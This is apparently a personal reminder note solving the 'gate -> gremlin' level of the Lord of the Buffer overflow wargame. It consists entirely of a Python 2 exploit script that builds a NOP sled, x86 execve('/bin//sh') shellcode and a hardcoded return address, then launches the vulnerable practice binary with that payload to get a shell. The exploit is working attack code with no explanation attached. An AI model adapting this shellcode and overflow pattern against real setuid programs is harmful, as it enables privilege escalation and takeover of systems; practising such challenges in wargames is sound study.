[Remind] LOB gate -> gremlin

exploit.py

import os
from struct import *


p = lambda x : pack("<L" , x)


shellAddress =  p(0xbffff948)


payload = "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*31+"AAAA"+shellAddress
print payload
os.execl('/home/gate/gremlin','/home/gate/gremlin',payload)